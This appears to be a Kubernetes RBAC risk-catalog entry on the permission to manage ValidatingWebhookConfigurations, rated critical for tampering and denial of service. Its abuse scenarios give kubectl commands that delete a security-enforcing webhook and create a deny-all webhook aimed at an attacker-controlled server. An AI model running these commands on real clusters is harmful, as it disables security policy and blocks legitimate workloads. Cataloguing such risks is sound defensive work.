Manage ValidatingWebhookConfigurations
Tampering
Critical
Overview
| Field | Value |
|---|---|
| ID | 1044 |
| Name | Manage ValidatingWebhookConfigurations |
| Risk Category | Tampering |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | admissionregistration.k8s.io |
| Resources | validatingwebhookconfigurations |
| Risky Verb Combinations | [create] · [update] · [patch] · [delete] |
| Tags | DenialOfService Tampering WebhookManipulation |
Description
Allows control over ValidatingWebhookConfigurations, which can validate or reject API objects during admission. An attacker can use this to tamper with security policies (e.g., disable a validating webhook that enforces security best practices) or cause denial of service by rejecting legitimate requests.
Abuse Scenarios
- Delete a ValidatingWebhookConfiguration that enforces security policies.
kubectl delete validatingwebhookconfiguration <webhook-name>
# Example: kubectl delete validatingwebhookconfiguration pod-security-policy-webhook
- Create a ValidatingWebhookConfiguration to block legitimate resource creation (DoS).
kubectl create -f - <<EOF
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
name: deny-all-pods
webhooks:
- name: deny-all-pods.example.com
clientConfig:
url: "https://<malicious-webhook-server>/validate" # Attacker-controlled server that always denies
caBundle: <base64-encoded-ca-cert>
rules:
- operations: ["CREATE"]
apiGroups: [""]
apiVersions: ["v1"]
resources: ["pods"]
admissionReviewVersions: ["v1", "v1beta1"]
sideEffects: None
failurePolicy: Fail # Crucial for DoS
EOF
# Example: kubectl create -f - <<EOF ... EOF